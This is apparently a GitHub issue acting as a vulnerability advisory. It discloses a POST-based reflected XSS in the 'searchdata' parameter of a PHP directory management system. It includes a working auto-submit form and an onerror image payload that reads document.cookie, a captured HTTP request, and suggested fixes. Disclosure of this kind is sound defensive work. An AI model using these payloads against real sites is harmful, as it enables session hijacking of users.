Skip to content

PHPGurukul Directory Management System Project - POST-based Reflected XSS in /searchdata.php #4

Open
Open
PHPGurukul Directory Management System Project - POST-based Reflected XSS in /searchdata.php#4
@bitborne

Description

@bitborne
bitborne
opened on May 11, 2025

PHPGurukul Directory Management System Project - POST-based Reflected XSS in /searchdata.php

NAME OF AFFECTED PRODUCT(S)

  • Directory Management System

Vendor Homepage

AFFECTED AND/FIXED VERSION(S)

Submitter

  • -Schatten-

Vulnerable Component

  • /searchdata.php

VERSION(S)

  • V2.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • Cross-Site Scripting (XSS) - POST-based Reflected

Root Cause

  • The search form using POST method fails to sanitize user-controlled input in the "searchdata" parameter. The server directly reflects the unsanitized input into HTML responses, allowing execution of arbitrary JavaScript when specially crafted POST requests are submitted.

Impact

  • Attackers can create malicious HTML forms or use JavaScript auto-submit techniques to exploit this vulnerability. Successful exploitation leads to session hijacking, CSRF attacks, and full client-side compromise. Although exploitation requires user interaction, phishing techniques make this feasible.

DESCRIPTION

  • The POST-based XSS vulnerability in Directory Management System's search functionality allows injecting JavaScript payloads through the "searchdata" parameter. Unlike GET-based XSS, attackers must trick users into submitting a malicious form, but the severity remains critical due to modern attack vectors like:
    • Hosting malicious form on phishing pages
    • Using XMLHttpRequest to auto-submit POST data
    • Exploiting through iframe injections

Exploitation requires user interaction but no authentication

Vulnerability details and POC

Vulnerability location:

  • POST parameter "searchdata" in form submission

Exploitation Flow:

  1. Attacker creates an auto-submit form:
<form id="xss" action="https://victim.com/searchdata.php" method="POST">
  <input type="hidden" name="searchdata" value="<img src=x onerror=alert(document.cookie)>">
</form>
<script>document.getElementById('xss').submit();</script>
  1. Victim visits attacker's page containing this code

Burp Request Capture:

POST /Directory%20Management%20System%20PHP/dms/searchdata.php HTTP/1.1
Host: 172.20.10.4
Content-Length: 65
Cache-Control: max-age=0
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

searchdata=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E

Proof-of-Concept Evidence:

Image

Image

Suggested repair

  1. Strict Content-Type Enforcement:
if ($_SERVER['CONTENT_TYPE'] !== 'application/x-www-form-urlencoded') {
    die("Invalid request");
}
  1. DOM-based Sanitization:
function sanitizeInput(input) {
    return input.replace(/[<>"'&]/g, function (char) {
        return {'<':'&lt;', '>':'&gt;', '"':'&quot;', '\'':'&#39;', '&':'&amp;'}[char];
    });
}
  1. CSRF Token Integration:
<input type="hidden" name="csrf_token" value="<?= generateSecureToken() ?>">

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions